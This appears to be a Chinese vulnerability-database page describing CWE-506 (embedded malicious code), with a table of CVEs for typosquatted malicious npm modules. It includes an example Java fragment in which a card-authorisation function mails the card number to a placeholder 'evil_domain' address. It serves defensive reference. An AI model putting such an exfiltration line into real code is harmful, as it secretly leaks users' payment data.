CWE-506 内嵌的恶意代码 类弱点 97 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-506指嵌入式恶意代码,属于软件内部植入的隐蔽后门或逻辑炸弹。攻击者通常利用开发者故意插入的代码,在特定条件触发时窃取数据或破坏系统,从而绕过正常安全机制。开发者应通过严格的代码审查、静态分析工具检测异常逻辑,并实施最小权限原则,确保代码来源可信且无未授权的后门植入,以从根本上杜绝此类内部威胁。
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2017-16065 | openssl.js 安全漏洞 — openssl.js node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16064 | node-openssl 安全漏洞 — node-openssl node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16063 | node-opensl 安全漏洞 — node-opensl node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16060 | babelcli 安全漏洞 — babelcli node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16059 | mssql-node 安全漏洞 — mssql-node node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16058 | gruntcli 安全漏洞 — gruntcli node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16057 | nodemssql 安全漏洞 — nodemssql node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16056 | mssql.js 安全漏洞 — mssql.js node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16074 | crossenv 安全漏洞 — crossenv node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16207 | discordi.js 安全漏洞 — discordi.js node module | 7.3 | - | 2018-06-07 |
| CVE-2017-16205 | coffescript模块安全漏洞 — coffeescript node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16204 | jquey模块安全漏洞 — jquey node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16203 | coffe-script模块安全漏洞 — coffeescript node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16202 | cofeescript模块安全漏洞 — coffeescript node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16128 | npm-script-demo 安全漏洞 — npm-script-demo node module | 9.8 | - | 2018-06-07 |
| CVE-2017-16081 | cross-env.js 安全漏洞 — cross-env.js node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16079 | smb 安全漏洞 — smb node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16078 | shadowsock 安全漏洞 — shadowsock node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16080 | nodesass 安全漏洞 — nodesass node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16077 | mongose 安全漏洞 — mongose node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16076 | proxy.js 安全漏洞 — proxy.js node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16075 | http-proxy.js 安全漏洞 — http-proxy.js node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16073 | noderequest 安全漏洞 — noderequest node module | 7.5 | - | 2018-06-07 |
| CVE-2017-16045 | jquery.js 安全漏洞 — jquery.js node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16046 | MariaDB 信息泄露漏洞 — mariadb node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16048 | node-sqlite 安全漏洞 — node-sqlite node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16049 | nodesqlite 安全漏洞 — nodesqlite node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16050 | sqlite.js 安全漏洞 — sqlite.js node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16051 | sqliter 安全漏洞 — sqliter node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16052 | node-fabric 安全漏洞 — node-fabric node module | 7.5 | - | 2018-06-04 |
CWE-506(内嵌的恶意代码) 是常见的弱点类别,本平台收录该类弱点关联的 97 条 CVE 漏洞。